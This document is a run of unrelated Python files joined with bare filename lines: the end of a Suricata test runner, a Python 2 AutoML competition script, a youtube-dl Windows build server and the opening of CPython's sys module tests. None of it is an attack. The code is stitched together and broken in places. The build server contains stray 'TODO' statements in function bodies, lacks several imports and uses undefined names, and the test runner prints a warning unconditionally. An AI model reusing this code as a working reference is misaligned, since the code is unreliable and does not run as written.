# check there and the top level directory to still support
# 4.1.
classification_configs = [
os.path.join(self.cwd, "etc", "classification.config"),
os.path.join(self.cwd, "classification.config"),
]
for config in classification_configs:
if os.path.exists(config):
args += ["--set", "classification-file=%s" % config]
break
reference_configs = [
os.path.join(self.cwd, "etc", "reference.config"),
os.path.join(self.cwd, "reference.config"),
]
for config in reference_configs:
if os.path.exists(config):
args += ["--set", "reference-config-file=%s" % config]
break
# Add other fixed arguments.
args += [
"--init-errors-fatal",
"-l", self.output,
]
if "ips" in self.name:
args.append("--simulate-ips")
args += ["-c", self.get_suricata_yaml_path()]
# Find pcaps.
if "pcap" in self.config:
args += ["-r", self.config["pcap"]]
else:
pcaps = glob.glob(os.path.join(self.directory, "*.pcap"))
pcaps += glob.glob(os.path.join(self.directory, "*.pcapng"))
if len(pcaps) > 1:
raise TestError("More than 1 pcap file found")
if pcaps:
args += ["-r", pcaps[0]]
# Find rules.
rules = glob.glob(os.path.join(self.directory, "*.rules"))
if not rules:
args.append("--disable-detection")
elif len(rules) == 1:
args += ["-S", rules[0]]
else:
raise TestError("More than 1 rule file found")
return args
def get_suricata_yaml_path(self):
"""Return the path to the suricata.yaml that will be used for this
test."""
if os.path.exists(os.path.join(self.directory, "suricata.yaml")):
return os.path.join(self.directory, "suricata.yaml")
return os.path.join(self.cwd, "suricata.yaml")
def start_reader(self, input, output):
t = threading.Thread(
target=pipe_reader, args=(input, output, self.verbose))
t.start()
self.readers.append(t)
def check_args_fail():
if args.fail:
with lock:
check_args['fail'] = 1
def check_deps():
try:
cmd = "jq --version > nil" if WIN32 else "jq --version > /dev/null 2>&1"
subprocess.check_call(cmd, shell=True)
except:
print("error: jq is required")
return False
try:
cmd = "echo suricata | xargs > nil" if WIN32 else "echo | xargs > /dev/null 2>&1"
subprocess.check_call(cmd, shell=True)
except:
print("error: xargs is required")
return False
return True
def run_test(dirpath, args, cwd, suricata_config):
with lock:
if check_args['fail'] == 1:
raise TerminatePoolError()
name = os.path.basename(dirpath)
outdir = os.path.join(dirpath, "output")
if args.outdir:
outdir = os.path.join(os.path.realpath(args.outdir), name, "output")
test_runner = TestRunner(
cwd, dirpath, outdir, suricata_config, args.verbose, args.force,
args.quiet)
try:
results = test_runner.run(outdir)
if results["failure"] > 0:
with lock:
count_dict["failed"] += 1
failedLogs.append(dirpath)
elif results["skipped"] > 0 and results["success"] == 0:
with lock:
count_dict["skipped"] += 1
elif results["success"] > 0:
with lock:
count_dict["passed"] += 1
except UnsatisfiedRequirementError as ue:
if not args.quiet:
print("===> {}: SKIPPED: {}".format(os.path.basename(dirpath), ue))
with lock:
count_dict["skipped"] += 1
except TestError as te:
print("===> {}: FAILED: {}".format(os.path.basename(dirpath), te))
check_args_fail()
with lock:
count_dict["failed"] += 1
def run_mp(jobs, tests, dirpath, args, cwd, suricata_config):
print("Number of concurrent jobs: %d" % jobs)
pool = mp.Pool(jobs)
try:
for dirpath in tests:
pool.apply_async(run_test, args=(dirpath, args, cwd, suricata_config))
except TerminatePoolError:
pool.terminate()
pool.close()
pool.join()
def run_single(tests, dirpath, args, cwd, suricata_config):
try:
for dirpath in tests:
run_test(dirpath, args, cwd, suricata_config)
except TerminatePoolError:
sys.exit(1)
def main():
global TOPDIR
global args
if not check_deps():
return 1
parser = argparse.ArgumentParser(description="Verification test runner.")
parser.add_argument("-v", dest="verbose", action="store_true")
parser.add_argument("--force", dest="force", action="store_true",
help="Force running of skipped tests")
parser.add_argument("--fail", action="store_true",
help="Exit on test failure")
parser.add_argument("--testdir", action="store",
help="Runs tests from custom directory")
parser.add_argument("--exact", dest="exact", action="store_true",
help="Use supplied name to make an exact match")
parser.add_argument("--skip-tests", nargs="?", default=None,
help="Skip tests with a given pattern")
parser.add_argument("--outdir", action="store",
help="Outputs to custom directory")
parser.add_argument("--valgrind", dest="valgrind", action="store_true",
help="Run tests in with valgrind")
parser.add_argument("--self-test", action="store_true",
help="Run self tests")
parser.add_argument("--debug-failed", dest="debugfailed", action="store_true",
help="Prints debug output for failed tests")
parser.add_argument("-q", "--quiet", dest="quiet", action="store_true",
help="Only show failures and end summary")
parser.add_argument("patterns", nargs="*", default=[])
if LINUX:
parser.add_argument("-j", type=int, default=min(8, mp.cpu_count()),
help="Number of jobs to run")
args = parser.parse_args()
if args.self_test:
return unittest.main(argv=[sys.argv[0]])
print("Warning: EVE files will not be valided: jsonschema module not found.")
TOPDIR = os.path.abspath(os.path.dirname(sys.argv[0]))
skipped = 0
passed = 0
failed = 0
# Get the current working directory, which should be the top
# suricata source directory.
cwd = os.getcwd()
if not (os.path.exists(suricata_yaml) and
os.path.exists(suricata_bin)):
print("error: this is not a suricata source directory or " +
"suricata is not built")
return 1
# Create a SuricataConfig object that is passed to all tests.
suricata_config = SuricataConfig(get_suricata_version())
suricata_config.valgrind = args.valgrind
tdir = os.path.join(TOPDIR, "tests")
if args.testdir:
tdir = os.path.abspath(args.testdir)
# First gather the tests so we can run them in alphabetic order.
tests = []
for dirpath, dirnames, filenames in os.walk(tdir, followlinks = True):
# The top directory is not a test...
if dirpath == os.path.join(TOPDIR, "tests"):
continue
if dirpath == tdir:
continue
basename = os.path.basename(dirpath)
if args.skip_tests:
skip_tests_opt = False
patterns = args.skip_tests.split(",")
for pattern in patterns:
if args.exact:
if pattern == basename:
skip_tests_opt = True
break
elif basename.find(pattern) > -1:
skip_tests_opt = True
break
if skip_tests_opt:
continue
# Check if there are sub-test directories
if "test.yaml" in filenames:
# gets used by os.walk in this for loop
dirnames[0:] = []
else:
continue
if not args.patterns:
tests.append(dirpath)
else:
for pattern in args.patterns:
if args.exact:
if pattern == basename:
tests.append(dirpath)
elif basename.find(pattern) > -1:
tests.append(dirpath)
# Sort alphabetically.
tests.sort()
if LINUX:
run_mp(args.j, tests, dirpath, args, cwd, suricata_config)
else:
run_single(tests, dirpath, args, cwd, suricata_config)
passed = count_dict["passed"]
failed = count_dict["failed"]
skipped = count_dict["skipped"]
print("")
print("PASSED: %d" % (passed))
print("FAILED: %d" % (failed))
print("SKIPPED: %d" % (skipped))
if args.debugfailed:
if len(failedLogs) > 0:
print("")
print("Failed tests debug output:")
for dirpath in failedLogs:
print("- Test %s:" % os.path.basename(dirpath))
for r, d, f in os.walk(dirpath+"/output"):
for fname in f:
path = os.path.join(r, fname)
print(" - %s" % path)
try:
with open(path, "r") as fcontents:
try:
buf = fcontents.read().decode()
print(buf)
except:
print(" - [Not dumping file that won't utf-8 decode]")
except Exception as err:
print("Failed to open %s: %s" % (path, str(err)))
if failed > 0:
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
automl.py
|
#Damir Jajetic, 2015
from sklearn.externals import joblib
from sklearn import *
from sklearn.utils import shuffle
import libscores
import multiprocessing
import time
import os
import numpy as np
import data_io
import psutil
import data_converter
import automl_worker
import automl_models
import automl_blender
import automl_sb
import automl_rf
import automl_gb
def baseline(output_dir, basename, valid_num, test_num, target_num):
preds_valid = np.zeros([valid_num , target_num])
preds_test = np.zeros([test_num , target_num])
cycle = 0
filename_valid = basename + '_valid_' + str(cycle).zfill(3) + '.predict'
data_io.write(os.path.join(output_dir,filename_valid), preds_valid)
filename_test = basename + '_test_' + str(cycle).zfill(3) + '.predict'
data_io.write(os.path.join(output_dir,filename_test), preds_test)
def predict(LD, Loutput_dir, Lstart, Ltime_budget, Lbasename, running_on_codalab):
try:
train_split = int(len(LD.data['Y_train'])*0.6)
test_split = int(len(LD.data['Y_train'])*0.8)
baseline(Loutput_dir, Lbasename, LD.info['valid_num'], LD.info['test_num'], LD.info['target_num'])
LD.data['X_train'], LD.data['Y_train'] = shuffle(LD.data['X_train'], LD.data['Y_train'] , random_state=1)
try:
if LD.info['task'] != 'regression':
for Le in range(10): #stratiffied split consume more time
if len(np.unique(LD.data['Y_train'][:train_split])) != len(np.unique(LD.data['Y_train'][test_split:])):
try:
LD.data['X_train'], LD.data['Y_train'] = shuffle(LD.data['X_train'], LD.data['Y_train'] , random_state=1)
except:
pass
except:
pass
if LD.info['task'] != 'regression':
try:
yt_raw = np.array(data_converter.convert_to_bin(LD.data['Y_train'], len(np.unique(LD.data['Y_train'])), False))
except:
yt_raw = LD.data['Y_train']
else:
yt_raw = LD.data['Y_train']
#Strategy is that we will have N workers that will try prediction models listed in separate file (will be described later)
# in shared data they will push CV score, and predictions for train, valid and test data
# separate blender worker will use this data to create linear ensemble.
# regardless of strategy, for competition purposes, it is good to have work in separate process, that can easily be killed
# there are 2 events visible to all workers
# a) stop writing - just to be sure that we don't kill process in the middle of writing predictions
# b) start_growing - after this point, stop searching for best parameters, just build new trees or other similar strategy
stop_writing_event = multiprocessing.Event()
exploit_event = multiprocessing.Event()
manager = multiprocessing.Manager()
shared_data = manager.Namespace()
shared_data.LD = LD
shared_data.yt_raw =yt_raw
#these are 3 dedicated workers
# 1. fast predictors with increasing data sample
# 2. ranomized decision trees predictor with increasing number of predictors (warm start)
# 3. boosting predictor with increasing number of predictors (warm start)
#1.
try:
shared_sb_data = manager.Namespace()
shared_sb_data.raw_model = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model1 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model2 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model3 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
shared_sb_data.raw_model4 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
sb_process = multiprocessing.Process(target=automl_sb.worker, args=([ shared_data, shared_sb_data, Lstart, Ltime_budget, train_split, test_split]))
sb_process.start()
except:
pass
#2.
try:
shared_rf_data = manager.Namespace()
shared_rf_data.model1 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
rf_process = multiprocessing.Process(target=automl_rf.worker, args=([ shared_data, shared_rf_data, Lstart, Ltime_budget, train_split, test_split]))
rf_process.start()
except Exception as e:
print e
#3.
try:
shared_gb_data = manager.Namespace()
shared_gb_data.model1 = {"done":0, "score":0, "preds_valid":None, "preds_test":None, "preds_2fld":None}
gb_process= multiprocessing.Process(target=automl_gb.worker, args=([ shared_data, shared_gb_data, Lstart, Ltime_budget, train_split, test_split]))
gb_process.start()
except Exception as e:
print e
#This is main part of strategy
# We will create namespace for sharing data between workers
shared_data = manager.Namespace()
shared_data.LD = LD
shared_data.yt_raw =yt_raw
#In automl_models.py should be listed all models (sklearn format only) with addtional properties
# model - model instance format - see examples
# blend_group - we will linear ensemble N best models, but don't want best of similar ones.
# to avoid this from same group only best one will be ensembled
# getter - updater - setter - after signal, getter is function that will read "interesting" parameter
# from model, updater will update it, and setter will change that parameter. This will repeat until end.
# example is "number of estimators get 80, update 80+20, push 100, next time read 100, update 120 push 120..."
# generator - parameters that will be changed in model in every iteration.
models = automl_models.get_models(shared_data)
models_count = len(models)
# We will create semaphore for workers
if psutil.virtual_memory()[2] > 50:
Lncpu = 1
elif psutil.virtual_memory()[2] > 40:
Lncpu = 2
else:
Lncpu = 6
semaphore = multiprocessing.Semaphore(Lncpu)
try:
#Creating N workers
for Lnum in range(models_count):
exec("shared_data.worker"+str(Lnum) + ' = {"done":0, "score":0, ' +
'"preds_valid": None, "preds_test": None, ' +
'"model":' + models[Lnum] ["model"]+ ', ' +
'"blend_group": "%s", ' +
'"getter": "%s", ' +
'"updater": "%s", ' +
'"setter": "%s", ' +
'"generator": "%s" ' +
'}') % (models[Lnum] ['blend_group'],models[Lnum] ['getter'], models[Lnum] ['updater'], models[Lnum] ['setter'], models[Lnum] ['generator'])
workers = [multiprocessing.Process(target=automl_worker.worker, args=([tr_no, shared_data, exploit_event, semaphore, train_split, test_split])) for tr_no in range(models_count)]
for wr in workers:
wr.start()
except Exception as e:
print e
try:
Lnw = Lnum
except:
Lnw = 0
blender_process = multiprocessing.Process(target=automl_blender.blender, args=([ shared_data, shared_sb_data, shared_rf_data, shared_gb_data, Lnw, stop_writing_event, Loutput_dir, Lbasename, Lstart, Ltime_budget, train_split, test_split]))
blender_process.start()
try:
explore_time = max(Ltime_budget - (time.time() - Lstart) - 60,0)
time.sleep (explore_time)
exploit_event.set()
except:
pass
while( (Ltime_budget - 40) > (time.time() - Lstart)):
time.sleep (1)
print "Stop signal sent", time.ctime(), "time left", Ltime_budget - (time.time() - Lstart)
stop_writing_event.set()
time.sleep (8)
try:
for wr in workers:
try:
wr.terminate()
except:
pass
except:
pass
try:
sb_process.terminate()
except:
pass
try:
rf_process.terminate()
except:
pass
try:
gb_process.terminate()
except:
pass
try:
blender_process.terminate()
except:
pass
print "Done", time.ctime(), "time left", Ltime_budget - (time.time() - Lstart)
except Exception as e:
print "exception in automl_automl", time.ctime(), "left=", Ltime_budget - (time.time() - Lstart), str(e)
try:
for wr in workers:
try:
wr.terminate()
except:
pass
except:
pass
try:
sb_process.terminate()
except:
pass
try:
rf_process.terminate()
except:
pass
try:
gb_process.terminate()
except:
pass
try:
blender_process.terminate()
except:
pass
|
buildserver.py
|
#!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import argparse
import ctypes
import functools
import sys
import threading
import traceback
import os.path
class BuildHTTPServer(ThreadingMixIn, HTTPServer):
allow_reuse_address = True
advapi32 = ctypes.windll.advapi32
SC_MANAGER_ALL_ACCESS = 0xf003f
SC_MANAGER_CREATE_SERVICE = 0x02
SERVICE_WIN32_OWN_PROCESS = 0x10
SERVICE_AUTO_START = 0x2
SERVICE_ERROR_NORMAL = 0x1
DELETE = 0x00010000
SERVICE_STATUS_START_PENDING = 0x00000002
SERVICE_STATUS_RUNNING = 0x00000004
SERVICE_ACCEPT_STOP = 0x1
SVCNAME = 'youtubedl_builder'
LPTSTR = ctypes.c_wchar_p
START_CALLBACK = ctypes.WINFUNCTYPE(None, ctypes.c_int, ctypes.POINTER(LPTSTR))
class SERVICE_TABLE_ENTRY(ctypes.Structure):
_fields_ = [
('lpServiceName', LPTSTR),
('lpServiceProc', START_CALLBACK)
]
HandlerEx = ctypes.WINFUNCTYPE(
ctypes.c_int, # return
ctypes.c_int, # dwControl
ctypes.c_int, # dwEventType
ctypes.c_void_p, # lpEventData,
ctypes.c_void_p, # lpContext,
)
def _ctypes_array(c_type, py_array):
ar = (c_type * len(py_array))()
ar[:] = py_array
return ar
def win_OpenSCManager():
res = advapi32.OpenSCManagerW(None, None, SC_MANAGER_ALL_ACCESS)
if not res:
raise Exception('Opening service manager failed - '
'are you running this as administrator?')
return res
def win_install_service(service_name, cmdline):
manager = win_OpenSCManager()
try:
h = advapi32.CreateServiceW(
manager, service_name, None,
SC_MANAGER_CREATE_SERVICE, SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,
cmdline, None, None, None, None, None)
if not h:
raise OSError('Service creation failed: %s' % ctypes.FormatError())
advapi32.CloseServiceHandle(h)
finally:
advapi32.CloseServiceHandle(manager)
def win_uninstall_service(service_name):
manager = win_OpenSCManager()
try:
h = advapi32.OpenServiceW(manager, service_name, DELETE)
if not h:
raise OSError('Could not find service %s: %s' % (
service_name, ctypes.FormatError()))
try:
if not advapi32.DeleteService(h):
raise OSError('Deletion failed: %s' % ctypes.FormatError())
finally:
advapi32.CloseServiceHandle(h)
finally:
advapi32.CloseServiceHandle(manager)
def win_service_report_event(service_name, msg, is_error=True):
with open('C:/sshkeys/log', 'a', encoding='utf-8') as f:
f.write(msg + '\n')
event_log = advapi32.RegisterEventSourceW(None, service_name)
if not event_log:
raise OSError('Could not report event: %s' % ctypes.FormatError())
try:
type_id = 0x0001 if is_error else 0x0004
event_id = 0xc0000000 if is_error else 0x40000000
lines = _ctypes_array(LPTSTR, [msg])
if not advapi32.ReportEventW(
event_log, type_id, 0, event_id, None, len(lines), 0,
lines, None):
raise OSError('Event reporting failed: %s' % ctypes.FormatError())
finally:
advapi32.DeregisterEventSource(event_log)
def win_service_handler(stop_event, *args):
try:
raise ValueError('Handler called with args ' + repr(args))
TODO
except Exception as e:
tb = traceback.format_exc()
msg = str(e) + '\n' + tb
win_service_report_event(service_name, msg, is_error=True)
raise
def win_service_set_status(handle, status_code):
svcStatus = SERVICE_STATUS()
svcStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS
svcStatus.dwCurrentState = status_code
svcStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP
svcStatus.dwServiceSpecificExitCode = 0
if not advapi32.SetServiceStatus(handle, ctypes.byref(svcStatus)):
raise OSError('SetServiceStatus failed: %r' % ctypes.FormatError())
def win_service_main(service_name, real_main, argc, argv_raw):
try:
# args = [argv_raw[i].value for i in range(argc)]
stop_event = threading.Event()
handler = HandlerEx(functools.partial(stop_event, win_service_handler))
h = advapi32.RegisterServiceCtrlHandlerExW(service_name, handler, None)
if not h:
raise OSError('Handler registration failed: %s' %
ctypes.FormatError())
TODO
except Exception as e:
tb = traceback.format_exc()
msg = str(e) + '\n' + tb
win_service_report_event(service_name, msg, is_error=True)
raise
def win_service_start(service_name, real_main):
try:
cb = START_CALLBACK(
functools.partial(win_service_main, service_name, real_main))
dispatch_table = _ctypes_array(SERVICE_TABLE_ENTRY, [
SERVICE_TABLE_ENTRY(
service_name,
cb
),
SERVICE_TABLE_ENTRY(None, ctypes.cast(None, START_CALLBACK))
])
if not advapi32.StartServiceCtrlDispatcherW(dispatch_table):
raise OSError('ctypes start failed: %s' % ctypes.FormatError())
except Exception as e:
tb = traceback.format_exc()
msg = str(e) + '\n' + tb
win_service_report_event(service_name, msg, is_error=True)
raise
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--install',
action='store_const', dest='action', const='install',
help='Launch at Windows startup')
parser.add_argument('-u', '--uninstall',
action='store_const', dest='action', const='uninstall',
help='Remove Windows service')
parser.add_argument('-s', '--service',
action='store_const', dest='action', const='service',
help='Run as a Windows service')
parser.add_argument('-b', '--bind', metavar='<host:port>',
action='store', default='localhost:8142',
help='Bind to host:port (default %default)')
options = parser.parse_args(args=args)
if options.action == 'install':
fn = os.path.abspath(__file__).replace('v:', '\\\\vboxsrv\\vbox')
cmdline = '%s %s -s -b %s' % (sys.executable, fn, options.bind)
win_install_service(SVCNAME, cmdline)
return
if options.action == 'uninstall':
win_uninstall_service(SVCNAME)
return
if options.action == 'service':
win_service_start(SVCNAME, main)
return
host, port_str = options.bind.split(':')
port = int(port_str)
print('Listening on %s:%d' % (host, port))
srv = BuildHTTPServer((host, port), BuildHTTPRequestHandler)
thr = threading.Thread(target=srv.serve_forever)
thr.start()
input('Press ENTER to shut down')
srv.shutdown()
thr.join()
def rmtree(path):
for name in os.listdir(path):
fname = os.path.join(path, name)
if os.path.isdir(fname):
rmtree(fname)
else:
os.chmod(fname, 0o666)
os.remove(fname)
os.rmdir(path)
#==============================================================================
class BuildError(Exception):
def __init__(self, output, code=500):
self.output = output
self.code = code
def __str__(self):
return self.output
class HTTPError(BuildError):
pass
class PythonBuilder(object):
def __init__(self, **kwargs):
pythonVersion = kwargs.pop('python', '2.7')
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Python\PythonCore\%s\InstallPath' % pythonVersion)
try:
self.pythonPath, _ = _winreg.QueryValueEx(key, '')
finally:
_winreg.CloseKey(key)
except Exception:
raise BuildError('No such Python version: %s' % pythonVersion)
super(PythonBuilder, self).__init__(**kwargs)
class GITInfoBuilder(object):
def __init__(self, **kwargs):
try:
self.user, self.repoName = kwargs['path'][:2]
self.rev = kwargs.pop('rev')
except ValueError:
raise BuildError('Invalid path')
except KeyError as e:
raise BuildError('Missing mandatory parameter "%s"' % e.args[0])
path = os.path.join(os.environ['APPDATA'], 'Build archive', self.repoName, self.user)
if not os.path.exists(path):
os.makedirs(path)
self.basePath = tempfile.mkdtemp(dir=path)
self.buildPath = os.path.join(self.basePath, 'build')
super(GITInfoBuilder, self).__init__(**kwargs)
class GITBuilder(GITInfoBuilder):
def build(self):
try:
subprocess.check_output(['git', 'clone', 'git://github.com/%s/%s.git' % (self.user, self.repoName), self.buildPath])
subprocess.check_output(['git', 'checkout', self.rev], cwd=self.buildPath)
except subprocess.CalledProcessError as e:
raise BuildError(e.output)
super(GITBuilder, self).build()
class YoutubeDLBuilder(object):
authorizedUsers = ['fraca7', 'phihag', 'rg3', 'FiloSottile']
def __init__(self, **kwargs):
if self.repoName != 'youtube-dl':
raise BuildError('Invalid repository "%s"' % self.repoName)
if self.user not in self.authorizedUsers:
raise HTTPError('Unauthorized user "%s"' % self.user, 401)
super(YoutubeDLBuilder, self).__init__(**kwargs)
def build(self):
try:
subprocess.check_output([os.path.join(self.pythonPath, 'python.exe'), 'setup.py', 'py2exe'],
cwd=self.buildPath)
except subprocess.CalledProcessError as e:
raise BuildError(e.output)
super(YoutubeDLBuilder, self).build()
class DownloadBuilder(object):
def __init__(self, **kwargs):
self.handler = kwargs.pop('handler')
self.srcPath = os.path.join(self.buildPath, *tuple(kwargs['path'][2:]))
self.srcPath = os.path.abspath(os.path.normpath(self.srcPath))
if not self.srcPath.startswith(self.buildPath):
raise HTTPError(self.srcPath, 401)
super(DownloadBuilder, self).__init__(**kwargs)
def build(self):
if not os.path.exists(self.srcPath):
raise HTTPError('No such file', 404)
if os.path.isdir(self.srcPath):
raise HTTPError('Is a directory: %s' % self.srcPath, 401)
self.handler.send_response(200)
self.handler.send_header('Content-Type', 'application/octet-stream')
self.handler.send_header('Content-Disposition', 'attachment; filename=%s' % os.path.split(self.srcPath)[-1])
self.handler.send_header('Content-Length', str(os.stat(self.srcPath).st_size))
self.handler.end_headers()
with open(self.srcPath, 'rb') as src:
shutil.copyfileobj(src, self.handler.wfile)
super(DownloadBuilder, self).build()
class CleanupTempDir(object):
def build(self):
try:
rmtree(self.basePath)
except Exception as e:
print('WARNING deleting "%s": %s' % (self.basePath, e))
super(CleanupTempDir, self).build()
class Null(object):
def __init__(self, **kwargs):
pass
def start(self):
pass
def close(self):
pass
def build(self):
pass
class Builder(PythonBuilder, GITBuilder, YoutubeDLBuilder, DownloadBuilder, CleanupTempDir, Null):
pass
class BuildHTTPRequestHandler(BaseHTTPRequestHandler):
actionDict = {'build': Builder, 'download': Builder} # They're the same, no more caching.
def do_GET(self):
path = urlparse.urlparse(self.path)
paramDict = dict([(key, value[0]) for key, value in urlparse.parse_qs(path.query).items()])
action, _, path = path.path.strip('/').partition('/')
if path:
path = path.split('/')
if action in self.actionDict:
try:
builder = self.actionDict[action](path=path, handler=self, **paramDict)
builder.start()
try:
builder.build()
finally:
builder.close()
except BuildError as e:
self.send_response(e.code)
msg = unicode(e).encode('UTF-8')
self.send_header('Content-Type', 'text/plain; charset=UTF-8')
self.send_header('Content-Length', len(msg))
self.end_headers()
self.wfile.write(msg)
except HTTPError as e:
self.send_response(e.code, str(e))
else:
self.send_response(500, 'Unknown build method "%s"' % action)
else:
self.send_response(500, 'Malformed URL')
#==============================================================================
if __name__ == '__main__':
main()
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
